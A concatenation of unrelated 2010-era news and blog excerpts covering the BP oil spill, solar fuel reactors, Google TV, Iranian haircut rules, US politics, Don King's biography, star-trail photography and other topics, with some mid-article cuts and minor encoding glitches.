“ I wanted to get in front of that upcoming spill and prevent the spill from occurring , but I found that the EPA and the federal government really had no controls over the operation of that pipeline . ”
ADVERTISEMENT
“ Knowing that these workers had information that the pipeline would rupture and had provided that to their management and senior management and nothing had been done , that made that a [ case for ] criminal negligence , at the very least , ” continued West .
“ We were preliminarily receiving [ reports which ] indicated that high - level management within BP , not only in the United States , but across the ocean and into London , were aware of the policies on the North Slope to forgo maintenance in exchange for saving money . ”
To West ’s shock , however , by 2007 “ something had shifted dramatically ” and he was told to cut his investigation short and settle out of court for a charge of corporate misdemeanor .
Instead of penalties of $ 672 million and possible felony charges against BP executives , the government settled for a mere $ 20 million and no criminal charges .
“ Now weÃ¢â‚¬â „ ¢re seeing the same sort of thing in the Gulf , ” West concluded .
“ What the government has done over the past several years is taught BP that it can do whatever it wants and will not be held accountable .
So , decisions have been made , very poor decisions have been made , to increase profits and put workers at risk and been allowed and endorsed by the federal government . ”
ADVERTISEMENT
According to the Huffington Post , as of Wednesday BP had “ relented ” and agreed to release “ a live video feed of the gushing oil well in the Gulf , ” which was was supposed to be posted at the website of Rep. Edward Markey ( D - MA ) , chairman of the Select Committee on Energy Independence and Global Warming .
At the time of writing , however , the website appeared to be unreachable , and several Twitter posts were suggesting that “ Markey ’s ‘ award - winning website ’ gonna need more bandwidth . ”
Here comes the sun ( Image : Sandia National Laboratories )
Greenhouse - gas - pumping cars are , let ’s face it , never going to be green .
But innovative sunlight - powered fuel production techniques could inch motor vehicles towards carbon neutrality .
Experimental solar - powered reactors have shown they can create the building blocks for synthetic liquid fuels .
They ’ve got a way to go , but these projects could take a big chunk out of net carbon dioxide emissions without the need for major changes to either vehicles or refuelling infrastructure .
A team at Sandia National Laboratories in Albuquerque , New Mexico , is developing a technique to create some of the ingredients for synthetic fuels from carbon - containing gases .
Their cerium - oxide - based system can convert CO 2 into carbon monoxide , and can also turn water into hydrogen .
Advertisement
Heliocentric orbits
The machine , called the Counter Rotating Ring Receiver Reactor Recuperator ( CR5 ) consists of two chambers separated by rotating rings of cerium oxide .
As the rings spin , a large parabolic mirror concentrates solar energy onto one side , heating it to 1500 °C and causing the cerium oxide there to release oxygen gas into one of the chambers , whence it is pumped away .
As the ring rotates further it takes the deoxygenated ring off the heat and allows it to cool before it swings round to the other chamber .
CO 2 is pumped into the second chamber , causing the cooled cerium to steal back an oxygen molecule , producing carbon monoxide and cerium oxide .
The process also works with water instead of CO 2 , with the reaction this time producing hydrogen .
Experiments late last year with a 14 - ring reactor have demonstrated that the process can produce carbon monoxide , although the failure of certain parts meant the device did not operate continuously for more than a few seconds at a time .
Bigger and better
The team is now working to improve reliability while building a bigger reactor with 28 rotating rings .
That will enable it to process more CO 2 and water , says James Miller , a combustion chemist at Sandia .
Once the reactor is producing a steady stream of hydrogen and carbon monoxide , the gases can be converted into a synthetic liquid fuel using a technique such as the Fischer - Tropsch process developed in Germany in the 1920s .
In this process the two gases are heated in the presence of an iron - based catalyst to produce hydrocarbon fuels .
Initially , the team plan to use CO 2 captured from power - plant exhaust flues to produce their synthetic fuel .
Ultimately , however , they hope to use CO 2 extracted directly from the air , although they are not developing their own carbon - capture technique to do so .
“ That is a huge challenge in itself , and we opted to focus on one hard problem at a time , ” says Miller .
Cunning with calcium
Such challenges have n’t deterred Aldo Steinfeld and his team at the Swiss Federal Institute of Technology , Zurich .
They have a system which is already sucking CO 2 out of the atmosphere to feed a synthetic fuel process .
The team ’s reactor again uses a large parabolic mirror to concentrate solar heat onto a chamber – this time containing calcium oxide .
Once it reaches 400 °C , air is pumped into the chamber , and the heat causes the calcium oxide to react with CO 2 to form calcium carbonate .
Next , the calcium carbonate is then heated again , this time to 800 °C , at which point it releases a pure stream of CO 2 and reverts back to calcium oxide .
This stream of CO 2 is piped into a second reactor .
Here , a solar concentrator is used to heat zinc oxide to 1700 °C , causing it to release oxygen molecules , leaving metallic zinc .
The temperature is then lowered and CO 2 and steam are pumped in , which react with the pure zinc to form syngas , a mixture of hydrogen and carbon monoxide , – and zinc oxide once again .
The team has previously experimented with a 10 - kilowatt prototype , and is planning to test a 100 - kilowatt version early next year .
Finding ways to use the sun ’s energy to create fuel should be one of the highest - priority areas for clean - energy technology research , says Ken Caldeira of the Carnegie Institution of Washington at Stanford University in California .
“ This area holds out the promise for technologies that can produce large amounts of carbon - neutral power at affordable prices , which can be used where and when that power is needed , ” he says .
“ It is one of the few technology areas that could truly revolutionise our energy future . ”
Read previous Green machine columns :
Hitting the lights in wasteful offices , Cementing greener construction , Generating more light than heat , Cheaper home power from sunlight , Power from the people , Rethinking internal combustion engines .
Convicted killer Ronnie Lee Gardner was executed by firing squad early Friday , the Utah Department of Corrections said .
Gardner , 49 , is only the third person to die by firing squad in the United States in 33 years .
Google TV was one of the highlights of the Google I/O conference .
It ’s a major product and a bold , new move for Google .
Unfortunately , not for lack of trying , the company did n’t do a great job at showcasing it at the I/O conference , as the demo was mired with technical problems , due to the thousands of Bluetooth devices interfering with the keyboards used to control the Google TV boxes .
Bringing more than half a dozen CEOs of the companies involved in the project , with some big names like Sony and Intel , does n’t help much if people still are n’t sure what your product does .
Thankfully , Google is now rectifying the mistake with a new , relatively short , video that goes a long way in explaining Google TV , how it works and why you should use it .
The premise is simple .
Unlike previous propositions that set about ‘ revolutionizing ’ the TV , Google ’s approach is to enhance the existing TV experience that a lot of people enjoy .
Most people spend more watching TV than they do online , not to mention online video .
Google TV works with your current setup , enabling you to watch the programs you love like you always have .
But this is made easier with the tools it provides , like searching to see what shows are on right now , or when a particular one airs .
You can also record all of your favorite programs too , using the Google TV interface .
These actions may be simpler with Google TV , but they ’re nothing new .
What is new is the possibility to get even more context and info about a show from the best place to do that , the web .
You can visit any web page , watch your Twitter stream as a major news event unravels , for example , or go to a Wikipedia page to get more info on a subject that comes up in one of the shows you ’re watching .
And , of course , the other major draw is online video .
YouTube is working on a dedicated version of the site created for the TV and other sites will be optimized for TV viewing as well .
All of this is explained in the video and the simple visual examples are much better suited to explaining the Google TV concept .
BEIRUT , Lebanon , July 6 , 2010 --
It 's something like a holy war on haircuts .
Iran 's Ministry of Culture and Islamic Guidance has issued a directive banning ' decadent ' hairstyles for men , restricting barber shops to only certain kinds of cuts .
The primary target : spiky , gelled hairdos associated with rebellious youths , corrupted by Western influence .
It 's a style that was commonly seen on the front line of last year 's post-election protests .
The faces and bodies of young Iranians have long been part of the political arena , an extension of Islam 's role in governing public life .
By law women must cover their heads and bodies ; men are encouraged to grow beards ( a sign of faith ) , discouraged from wearing neckties ( too foreign ) , and now , banned from getting hip hairstyles ( too subversive ) .
Iran launched a crackdown on so - called ' Western ' hairstyles in 2007 , yet the streets of Iran remain a mix : some men bearded and in conservative clothing – a way to wear their faith - and others in blue jeans , ponytails and long hair , or sporting the spiky style .
At times police have cracked down on what has been deemed illegal hair or dress , just as they have clamped down on women whose head scarves reveal too much scalp .
Just after the presidential election controversy , the policing of personal style started loosening up , says Nader Talebzadeh , a prominent filmmaker in Tehran .
Women 's outfits started veering into styles that were considered erotic for Iran , and away from the standard roupoush , or overcoat , which is meant to hide the contours of the body .
But in the months that followed the government renewed its focus on Islamic behavior , once again deploying state forces to keep up appearances .
On Monday , the Iranian government unveiled the first photographs of hairstyles it wants to see on men – clean cut , with some gelling and sideburns permitted .
The images are part of a " journal of Iranian hairstyles approved by the ministry , " released ahead of the Modesty and Veil Festival later this month .
Enforcing the Regulations
Interpretations vary as to whether veils for women and style restrictions for men are specifically mandated in Islam .
President Mahmoud Ahmadinejad himself has varied on the point of enforcement .
Last month he said he is against any forceful imposition of clothing laws , drawing ire from clerics in his own hard - line camp .
Ayatollah Ahmed Jannati , a conservative , has long complained about immodest dress , and was especially vocal when rules were relaxed after the election .
It 's unclear how authorities would enforce the new regulations on haircuts in barbershops across the country .
Talebzadeh , the filmmaker says , " parents will do most of the enforcement . "
He points out that Iran 's government has come to accept a range of technically illegal behavior , from the use of TV satellite dishes to Western movies and underground music sold on the street .
Sources in Tehran say that at rest stops and movie theaters , pirated copies of ' Lost ' and ' Prison Break ' constantly sell out .
It is as if the government is finding a compromise , trying to calm political tensions by easing up on lifestyle factors .
' It 's about testing the tolerance of the government .
Eventually , people find the middle path , and the authorities learn to cope , " said Talebzadeh .
Who'd have thought a country with a national dish composed of French fries covered in cheese curd and gravy -- they call it poutine -- could ever become so popular .
Thats even before you consider its long winters or Celine Dion .
And yet , there it is .
Suddenly everyone wants to know about Canada .
Specifically about Canadian government finances during the 1990s .
U.K. Chancellor of the Exchequer George Osborne is only the latest in a line of treasury ministers wondering how he might be able to reproduce the Canadian economic ...
GOP TO OBAMA : LEAVE BP ALOOOOOONE ...
As astounding as Rep. Joe Barton 's ( R - Texas ) groveling public apology to BP was yesterday , there 's a much larger , more relevant truth to keep in mind : President Obama is getting tough with BP , and the Republican Party wishes he would n't .
For weeks , much of the criticism of the White House was centered around the idea that the administration was n't pushing BP hard enough .
But on Wednesday , the president went into a meeting with the company 's executives , told them how it was going to be , and BP quickly agreed .
The result : a $ 20 billion pot of money that will bring much - needed help to workers , businesses , and families who 've been victimized by a devastating oil spill .
This was no small task for Obama , and Americans have every right to be pleased .
( One poll this week found 82 % of the public supports the creation of the escrow fund . )
And yet , Republicans seem to be outraged .
We talked yesterday about GOP officials and candidates sticking up for BP , and today , ThinkProgress put together this compilation video of Republican media figures doing the same thing .
It 's all quite breathtaking , and the result of a strategy the party really has n't thought through .
Indeed , the rhetoric is almost comical .
Fox News ' Brian Kilmeade suggested this morning that Obama is being " too tough " on BP .
Talk of a " shakedown " is ubiquitous in conservative media circles .
Some Republican media personalities have described the president 's securing of funds for the Gulf Coast as " illegal " and " unconstitutional . "
Even after party leaders said Barton was " wrong , " leading party voices , including Rush Limbaugh , continue to insist he was right .
Now , it 's possible that Republicans in Congress and in the media are simply offering a knee - jerk response -- Obama secured funding for spill victims , so the funding must be bad -- but there seems to be more to this .
Republicans on the Hill and in the media just want BP to be treated with kid gloves .
A foreign oil giant is responsible for the worst environmental catastrophe in American history , and the GOP would prefer that Obama go easy on the company .
In Rand Paul 's words , for the president to even criticize BP is " un-American . "
It would be better , Republicans are arguing , if aid to help spill victims did n't exist , and if the president did n't take the lead in getting resources for the region .
Every day , it seems to get a little easier for Democrats to characterize Republicans as " The Party of BP . "
There are very few members of Congress as widely detested as Michele Bachmann , not just in her own suburban Minnesota district , but across the country .
You have to work hard for years -- the way Steve King does -- or get really " lucky " -- the way Joe Barton just did -- to become a national figure of complete opprobrium .
Whether it 's Rand Paul practically weeping and moaning about how unfair to the property rights of slave holders emancipation was ( or , more recently , sticking up for B.P. ) , Virginia Foxx insulting -- even spitting -- on the memory of Matthew Shepard or Mean Jean Schmidt managing to insult every veteran who ever served our nation , only a few kooks ever rise to national political celebrity as an actual fiend .
And no one has worked that field better than Michele Bachmann .
Next weekend , Blue America will officially endorse Tarryl Clark , the progressive state senator running against Bachmann in the sixth district and Tarryl will join us at Crooks and Liars for a live blog session .
It should be lots of fun .
Why do I think so ?
Watch Tarryl 's brand new ad that makes it clear how Bachmann is n't just supporting Joe Barton -- she 's even worse : Steve Benen , could claim that a bank - bench bomb - throwing charicature like Bachmann is really just the tip of the spear for the systemic reactionary policy agenda of the GOP .
In fact , yesterday his Political Animal column at themade that case ... and without ever once mentioning her name !
And the whole Republican Party really and truly is Michele Bachmann .
Labels : Michele Bachmann , Tarryl Clark
sold since 1984 is the first Honda Insight , built in 2000 , with an EPA rating of 49 city , 61 highway that 's unmatched today .
The Prius is second on the list .
Neither of these are surprises , but No. 3 could raise some eyebrows : the 1984 Chevy Sprint , a car that achieved 44/53 mpg without a hybrid–electric drivetrain or any other fancy hardware .
So how does this 25 - year - old car beat so many modern ones and why do n't we have more like it today ?
The Sprint was a rebadged Suzuki that was originally designed for the Japanese market .
It was Chevy 's attempt to supplant the unloved Chevette .
Barebones does n't begin to describe the car , but it was light , around 1600 pounds — about 1500 pounds less than a similar car weighs today — and had a tiny 1.0 - liter three - cylinder engine .
That 's a recipe for dynamite fuel economy .
Unfortunately , there was n't room for anything else , like , for example , acceleration .
The Sprint needed over 15 seconds to reach 60 mph , which made merging a real exciting endeavor .
If that was n't enough of a safety risk , the words " tin can " do a pretty good job describing that car 's structure .
You do n't get 1600 pounds and side - impact door beams , crush zones or , of course , airbags .
Neither did it have power steering , cup holders , power windows , sound deadening or any of the other amenities we take for granted these days .
Thanks to a combination of tougher emission and crash regulations and higher buyer expectations , the Sprint has no chance of resurfacing .
Nowadays , carmakers try to deliver the same or better fuel economy as the Sprint but without the unacceptable sacrifices .
They do it with technology such as hybrid–electric and diesel powertrains .
There 's a point to be made that a modern car is a tad overbloated and could stand to lose a few pounds .
In the future they will , but weight reduction costs money .
The top car on the list , the 2000 Honda Insight , had an aluminum unibody that cut weight to 2100 pounds .
No modern car , save for the Lotus Elise , matches that figure .
But an aluminum unibody is expensive , which is why only premium cars employ it for the entire structure .
Yes , the Insight had it , but Honda lost money on every one it sold , which is why the current Insight uses steel .
Maybe some folks would endure the Sprint 's spartan interior , dreadful road noise , and dubious safety for high mileage , but we'd bet that figure is small .
And if you 're one of them , you can probably still find a few Sprints out there .
Here 's a tip :
It continued as the Geo Metro and it 'll be worth what you paid .
This content is created and maintained by a third party , and imported onto this page to help users provide their email addresses .
You may be able to find more information about this and similar content at piano.io
For indispensable reporting on the coronavirus crisis , the election , and more , subscribe to the Mother Jones Daily newsletter .
We have some genuinely good news today .
President Obama promised in his State of the Union address to work with Congress this year to “ finally repeal the law that denies gay Americans the right to serve the country they love because of who they are . ”
He has n’t exactly been a ball of fire on this topic since then , however , and Defense Secretary Robert Gates , though plainly in favor of repealing DADT , wants to wait until the Pentagon has finished studying how to implement repeal later this year .
Meanwhile , Sen. Carl Levin has promised to put repeal in this year ’s Senate ’s annual defense spending bill but Rep .
Ike Skelton has n’t been keen on doing the same thing in the House bill .
But now it appears we have a deal :
Under the compromise , worked out in a series of meetings Monday at the White House and on Capitol Hill , lawmakers will proceed to repeal the Clinton - era policy in the next several days , but that action will not go into effect until the Pentagon completes a study about implementing the repeal .
In a letter to lawmakers pushing for a repeal , the White House wrote Monday that “ such an approach recognizes the critical need to allow our military and their families the full opportunity to inform and shape the implementation process through a thorough understanding of their concerns , insights and suggestions . ”
This is actually not much of a compromise .
It ’s basically a complete win the DADT repeal forces , since implementation always would have taken some time no matter when repeal was passed .
Pelosi and Reid already support repeal , and now , with Obama ’s active support , the chances of getting it through Congress are excellent .
Adam Weinstein has more here .
So if things go the way I think they ’ll go , by later this year Obama , Pelosi , and Reid will have passed a historic stimulus bill , the Lily Ledbetter Act , healthcare reform , college loan reform , financial reform , repeal of DADT , and Obama will have withdrawn from Iraq . 1
Not bad for 18 months of work .
And who knows ?
There ’s even a chance that Obama ’s Afghanistan escalation will work .
If it does , what president since LBJ will have accomplished more in his first term ?
1 Except for the pesky “ residual force , ” of course .
Still , once the combat forces are gone , it ’s hard to see a scenario in which they ’re ever sent back in .
It was pretty clear early on that LOST is mainly Jack ’s story .
Then it got kinda muddy there and he lost his way .
It ’s nice to see his character evolving again as we get closer to the end .
He ’s finally becoming the hero we always wanted .
Like a Jack Potter or Jack Skywalker !
hehehe
Israel 's blockade
There 's not much I can say about the mess the Israeli government has made for itself that Spencer Ackerman does n't say in this post .
The only thing I 'd add is that the international reaction to Israel 's actions is evidence that its blockade of Gaza never made much sense in the first place .
So long as people did n't really know that the Israeli government was using force to deny residents of Gaza fresh meat , dried fruit , canned fruit , clothing fabric , chickens , cattle , coriander , musical instruments and much more , Israel 's blockade was relatively safe .
But the more that the nature of the blockade is revealed , the less support there is for it ( " you mean it 's not just stopping weapons ? " ) and the worse Israel 's military actions in defense of the blockade look .
Further complicating matters for Israel , the more publicity the blockade gets , the more people begin to understand why ordinary Palestinians hate Israel so much , and the role that Israeli policy has in delaying peace .
Graphic credit : The Economist .
Laugh you may have when you heard that Kevin Costner was stepping into BP 's oil spill disaster with a potential solution , but BP has now snapped up 32 of the centrifuge machines to help separate the oil from the water .
Advertisement
The technology was created by Costner 's brother , with the actor pumping in $ 20 m over 15 years .
While 40,000 barrels worth of oil is leaking into the gulf of Mexico each day , the V20 machine can clean up 200 gallons of water a minute .
Advertisement
Horrendous the spill disaster may be , but it 's terrific well - known personalities such as Costner and James Cameron are leaping forward with possible solutions to clean up the gulf .
[ ABC via The Guardian ]
Video from last month which shows off Ocean Therapy Solutions ' technology :
It ’s time to talk a bit about Bibliographica , a new project of the Open Knowledge Foundation .
Bibliographica is designed to make it easier for scholars and researchers to share and collect information about work in their field .
It provides an open source software platform to create and share semantically rich information about publications , authors and their works .
As readers of the Open Knowledge Foundation blog will know we have a long - standing interest in open bibliographic data – from our efforts starting in 2005 to build a database of public domain works , our coordination of the response to the Library of Congress ’ Future of Bibliographic Control ( 2007 ) and the recent creation of a new working group on open bibliographic data in March this year .
Bibliographica itself , is a long - held dream of Jonathan Gray , OKF ’s Community Coordinator – a commons of open data surrounding scholarly communications .
Thanks to collaboration and support from IDEA Lab at the University of Edinburgh , the dream is a bit closer to reality .
The primary “ technical ” features of Bibliographica are :
Rich ( FRBR - based ) domain model
Semantic web and linked open data to the core providing for very flexible metadata and easy integration of external material
Wiki - like revisioning of all changes enabling easier and freer collaboration
Software and a Service
Designed to be installed and run by others
Distributed — can run different nodes with pull ( and push ) of data between them
But what needs of users does Bibliographica aim to satisfy ?
Easy collaboration by scholars and librariains in creating bibliographies and enhancing catalogues
Often the people who know most about what is published in a given field are the researchers who are active in that field .
Bibliographica will enable scholars to directly collaborate on annotated bibliographic indexes for their subject area .
A revisioned ( wiki - like ) approach to adding metadata allows for more open collaboration , and a semantic web base means support for rich metadata with a good standard structure .
We think that letting researchers directly add or edit details about publications in their field — which they can then export , publish , or do whatever they like with — is a good way to keep this information accurate and up to date .
Easy creation of publication lists for different uses
Bibliographica will provide either directly , or via integration with existing tools , an easy way to create and annotate lists of publications .
Create a reading list for an undergraduate course , a bibliography for a book or article that you are writing , or a detailed list of works about a given person .
Open software and service so anyone can run their own copy
Bibliographica will be a fully open service .
All the code will be open source and by default all the data will be openly licensed .
Just as projects like WordPress allow anyone to set up their own copy ( rather than depending on a centralised and possibly proprietary third - party service ) , so institutions and groups of researchers will be able to set up and run their own instance of Bibliographica , which they can customise and extend .
More sophisticated data models and searches
We plan to harness the specialised knowledge of researchers in particular domains to richly annotate information in the database so that one can provide ( good ) answers to questions like : “ What was published on Nietschze in English between 1950 and 1975 ? ”
Linked Data vocabularies allow wide range of statements to be made about a work or author .
We ’re starting with the Dublin Core and SKOS vocabularies , and defining some of our own for expressing the types of things that can be said about works or authors .
Once a substantial amount of such information has been collected it will become possible to use inferencing techniques to provide answers to more subtle and interesting questions than would be answerable by the usual bibliographic metadata alone .
Get involved
We ’ll be writing more in the coming weeks about the roadmap for the Bibliographica service and some of the specifics around the use of Linked Data to describe scholarly communications .
It would be great to hear from those of you who ’d like to get involved – helping to refine the data models , suggest vocabularies we should be re-using , contributing research resources to the version at bibliographica.org or testing out your own instance of the Bibliographica software .
Please get in touch , or join us on the Open Knowledge Foundation ’s open - bibliography mailing list .
Resources
Main page : http://bibliographica.org/
SPARQL endpoint : http://bibliographica.org/sparql
Full Text Search : http://bibliographica.org/search
Get Involved : http://bibliographica.org/get-involved
August 3 , 2009 [ 1 ]
He was a Kenyan senior governmental economist , and father of the President of the United States , Barack Obama .
He is a central subject in his son's memoir , Dreams from My Father .
In a 2006 TIME Magazine article called " My Spiritual Journey " written by Barack Obama , he writes about his father 's atheism :
" My father was almost entirely absent from my childhood , having been divorced from my mother when I was 2 years old ; in any event , although my father had been raised a Muslim , by the time he met my mother he was a confirmed atheist , thinking religion to be so much superstition . "
Askmen.com covered Barack Obama 's father 's atheism as well
Most famous for being a certain someone ’s father , Barack Obama Sr. has only really attracted interest in light of his son ’s historic achievement of becoming the first non-white President of the United States .
Originally from Kenya , Obama Sr. was born into a Muslim family .
By the time he moved to the USA to study economics , it appeared that he had turned away from religion , and had become an avowed atheist .
The new President claimed that by the time his parents met , his father saw religion as mere superstition .
Don King A Prison Education
King 's next brush with the law would be much more serious , and would very nearly cost him everything .
On April 20 , 1966 , Don King walked into the Manhattan Tap Room and spotted a man by the name of Sam Garrett — a former employee in King 's racket who owed him $ 600 on a bet .
Sickly , small , and drug- addicted , Garrett was no match for King .
But King was in no mood for forgiveness .
Their argument very quickly turned into a brawl , and then a beating in the street outside the bar , a beating that ultimately left Garrett dead from his injuries .
King claimed self - defense , and witness accounts vary , but for the first officer on the scene , the beating was a brutal , almost demonic assault .
In an interview with sportswriter Jack Newfield , Officer Bob Tonne said he saw " a man 's head bouncing off the asphalt pavement like a rubber ball .
Then he saw another man standing over him with a gun in his right hand , applying another kick to the head . "
Even after he was subdued and the fight was over , " King got in one last vicious kick that Tonne would never forget . "
Chronology 1931 Born August 20 in Cleveland , Ohio 1950 - 67 Numbers runner in Cleveland 1954 On December 12 , shoots and kills Hillary Brown , who is attempting to rob one of King 's gambling houses .
The shooting is ruled a " justifiable homicide . "
1967 On April 20 , beats Sam Garrett to death .
Convicted of second degree murder , but sentenced on a reduced manslaughter charge , to Marion Correctional Institute , in Ohio .
1971 Paroled on September 30 1972 Brings Muhammad Ali to Cleveland to fight in exhibition match on behalf of a local black hospital 1973 Becomes co-manager of Larry Holmes with Don Butler , by 1975 Butler has been eased out ( he later sues King ) 1974 Promotes " Rumble in the Jungle " between Muhammad Ali and George Foreman 1975 Promotes " Thrilla in Manilla " between Ali and Joe Frazier , often considered the greatest boxing match ever 1977 Investigated by FBI for doctoring fighters ' records ; no charges filed , but ABC cancels contract with King for several fights Early 1980s Again investigated by FBI as part of larger probe in boxing ; no charges filed 1983 Granted full pardon for earlier murder conviction by Governor of Ohio 1984 Indicted on insurance fraud charges , with secretary Constance Harper 1984 Promotes Michael Jackson 's reunion " Victory Tour " with Jackson brothers 1984 Indicted on insurance fraudcharges , with secretary Constance Harper 1985 Acquitted of insurance fraud ( Harper found guilty ) 1985
Found not guilty of insurance fraud ( Harper found guilty ) 1988 Sued by Larry Holmes for $ 300,000 ( settles for $ 100,000 ) 1988 Signs Mike Tyson 1995
Tried on wire fraud charges stemming from the insurance fraud investigation ; case ends in a mistrial 1998 Acquitted in second trial for wire fraud 1998 Sued by Mike Tyson for $ 100 million 2002 Sues longtime rival Bob Arum for " stealing " heavyweight Julio Cesar Chavez
Awards and Accomplishments 1974 Promotes " Rumble in the Jungle " between Muhammad Ali and George Foreman 1975 Promotes " Thrilla in Manilla " between Ali and Joe Frazier , often considered the greatest boxing match ever 1975 Man of the Year , National Black Hall of Fame 1976 Urban Justice Award , Antioch School of Law 1976 Heritage Award , Edwin Gould Society for Children 1976 Man of the Year , NAACP 1980 Citation for Outstanding Support and Service , U.S. Olympic Committee 1981 George Herbert Walker Bush Award , President 's Inaugural Committee 1981 Award of the Year , National Black Caucus 1983 Promoter of the Year , North American Boxing Federation 1984 Humanitarian Award , World Boxing Council 1986 Merit Award , Black Entertainment and Sports Lawyers Association 1987 Dr. Martin Luther King Jr. Humanitarian Award , Jamaica America Society and U.S. Information Service 1997 Inducted in Boxing Hall of Fame 1998 Honorary Doctorate in Humane Letters , Shaw University , Raleigh , NC
Despite reports of witness intimidation and attempted bribery , King was convicted of second - degree murder .
Normally , this would have meant a life sentence with eligibility for parole after eight and a half years .
Oddly , the presiding judge — in a highly controversial decision reached in the privacy of his chambers — set aside the execution of the sentence , in effect changing the conviction - to manslaughter , which allowed King to emerge from prison in less than four years .
There is no question that Don King used his years in prison to great advantage .
He read widely in literature and philosophy , getting the education he had bypassed before .
As he put it himself : " I did n't serve time .
I made time serve me . "
He also managed to purchase from a Cleveland city councilor a 40 - acre farm for a mere $ 1,000 , a decidedly small sum for such a property .
Interestingly , the farm was occupied by a woman named Hattie Renwick , a widow who eventually married Don King .
Gifted astrophotographer Stéphane Guisard -- whose Easter Island picture garnered him the # 3 spot in my Top Ten Astronomy Pictures of 2009 -- has done it again .
He just published this amazing picture of star trails , but it 's not like one you 've ever seen :
[ Click to see a bigger , cleaner pic , and yes , you really want to ! ]
This astonishing picture shows the entire sky from horizon to horizon with the help of a wide angle lens ( to help orient you , south is to the left , north to the right , west at the bottom , and east is at the top ) .
It was taken on a volcano called Chimborazo , which is in Ecuador .
The volcano has a latitude of 1.5° south , so it sits almost exactly on the Equator [ Update : Stéphane sent me a note that he has been to this volcano before , and has an amazing Milky Way picture taken from it . ]
Guisard started the exposure about an hour after sunset , once the sky got dark , and ended 10 hours later , about an hour before sunrise .
Because of this , it shows roughly 90 % of the entire visible sky !
How can this be ?
If you 've ever been to this blog before , you know I 'll be happy to explain .
But it takes a minute , so I 've split the rest of this post up into two sections : you can read about the guts of how this picture works just below , or you can skip to the part where I describe what 's in it ( stars and so on ) .
Enjoy .
1 ) How this can be : [ First , a note : when I say " entire sky " , I mean the whole thing , like you were floating out in deep space and could see in every direction with nothing blocking your way .
It would feel like you were in the center of a sphere with the stars surrounding you no matter which way you look .
On Earth at any one moment , the most you can see is 1 / 2 the sky , because the Earth itself blocks your view . ]
OK , we need a a little geometry lesson .
Imagine you are standing on the north pole .
As the Earth spins under you , the stars appear to make circles centered directly over your head .
Polaris would make a tiny little circle in 24 hours ( it 's not exactly on the north celestial pole , the point in the sky directly over the Earth 's north pole , but it 's close ) , and stars farther from the pole would make bigger circles .
At the horizon , the circles would be biggest .
But that 's all you could see .
The Earth itself blocks your view of the southern sky , so you can only see half the entire sky .
The stars all make circles that are parallel with the horizon , so they never rise nor set .
It does n't matter what time of night you go out ; you see the same stars , just in different positions in the sky .
You 'll never see Alpha Centauri or the Southern Cross .
The same is true if you were to stand on the south pole , except this time you can only see the southern sky .
The Earth would forever block your view of the Big Dipper , Polaris , and other exclusively northern sights .
Things change if you 're on the Equator .
Facing north , you would just see Polaris on the horizon -- and actually it would be a bit above the horizon , due to , of all things , our atmosphere .
The air of the Earth acts like a lens , bending the path of the light from stars near the horizon .
Because of this , Polaris would actually be about two degrees ( about 4 times the size of the full Moon ) above the horizon .
If the Earth had no atmosphere , Polaris would be exactly on the horizon as seen from the Equator .
Turning round and facing south , you 'd see the south pole of the sky ( marked by the much fainter star Sigma Octans ) , which would likewise be on the horizon .
Facing east , you 'd see stars just now rising , and facing west those that are just now setting .
If we had no Sun , over the course of 12 hours you 'd see every single star in the sky as the Earth rotates beneath you .
That 's because any star just setting in the west as you start your observation will be just rising in the east 12 hours later .
However , we do have the Sun ( yay ! ) and so you can't observe for 12 straight hours , only realistically about 10 .
So you do n't see the whole sky over the course of the night , you can only see about 10 / 12 = 5/6 = 80 % .
If you can push the observing for another half hour you can get up to about 87 % of the sky .
[ Update : Stéphane corrected my math here , and he 's right .
My apologies for any confusion !]
Astronomers divide the sky up into 24 hours -- in this case , each " hour " is the distance a star on the Equator of the sky will travel in that time .
It 's equivalent to 15 degrees ( 360 degrees / 24 hours = 15 degrees per hour ) .
The part of the sky not seen in a picture like the one above is shaped like a watermelon slice , with the narrow points at each pole and the widest part at the Equator , near the Sun 's position .
It 's one hour wide on each side of the Sun , so altogether that slice is two hours wide .
That means the picture has the entire sky ( 24 hours ) minus those two hours , for a total of 22 hours .
The amount of sky seen is therefore 22 / 24 = 11/12 = 92 % .
Plus , the Earth 's air give you a bonus : because it bends the light of stars low to the horizon , you can actually see stars that are below your physical horizon !
In a sense , the air is acting like a periscope , allowing you see around a corner .
So all this together means that Guisard 's remarkable all - night photo from the Earth 's Equator shows over 90 % of the entire sky that is possible to see from the ground .
Amazing .
2 ) So what 's the deal with this picture , anyway ?
He used a fish - eye , a wide angle lens , to capture the entire 360° view of the sky .
That 's why star trails near the poles are distorted .
The bright trails near the southern pole are from Crux , the Southern Cross .
You can also see a bright meteor that blazed its way near the pole , too .
Other stars are identifiable if you know your way around -- though without labels they 're hard to find and even harder to describe .
Let me try a few ( though no promises on my accuracy ! ) :
The reddish - orange streak to the right of center and extending almost the whole picture vertically is from Arcturus .
I suspect the red streak just to its left that only extends a third of the way up from the photo 's bottom is Mars .
I think the whitish streak to the upper right is Capella , and the bright blue one just to the right of that is Vega .
Interestingly , Orion straddles the Equator , so the three stars marking the belt would all blur together in a picture like this .
Plus , this picture was taken when Orion was near the Sun , so it 's only seen briefly in this picture , making a short trail : orange - hued Betelgeuse is the very short streak at the bottom of the image , just to the right of center .
I suspect the bright streak at the very top is Sirius , the brightest star in the night sky , and the bright streak near the bottom just to the left of center is Fomalhaut .
The famous star Alpha Centauri is the long yellow streak to the left of center starting at the top of the image .
Where that streak ends , at about the center of the picture , you can see an orange streak continuing just to its left ; that 's Beta Centauri .
I 'll leave the rest to you to discover .
And I 'll note that I spent some time a couple of years ago in the Galapagos , at pretty much the exact same latitude this picture was taken .
The southern skies are breathtaking , and seeing Alpha Centauri for the first time was incredible .
I hope sometime to repeat the experience .
And if I do , I may just try to get some star trail pictures for myself .
Picture courtesy Stéphane Guisard , who actually alerted me to it .
P.S. The title of this post is a pun on the title of a classic science fiction story by one of my favorite authors of all time .
And that 's all I 'll say about that .
" The iPad 's IPS panel is pressure - sensitive , you say ? "
No , that 's not quite right , but with some clever software and a special capacitive stylus , the folks at Ten One Design built a convincing proof of concept anyhow .
While we 're not quite sure how it works , the current theory states that the soft tip of the stylus expands like a brush when you press it down , generating a " larger press " that can be detected by the hooks in Ten One 's code -- which they soon plan to share as a free software library ( assuming Apple allows ) with developers around the world .
See it in action in a video after the break , and if you 're feeling your inner Rorschach today , let us know what you see in the above drawing .
A weekly comic strip , covering politics , pop culture , and the absurd .
How to Opt - In to Your Rights
Say " Miranda Rights " three times into a mirror .
" Miranda ! Miranda ! Miranda ! "
Wait between 4 pm & 10 pm for a Supreme Court Justice to activate your rights .
Power cycle the judiciary .
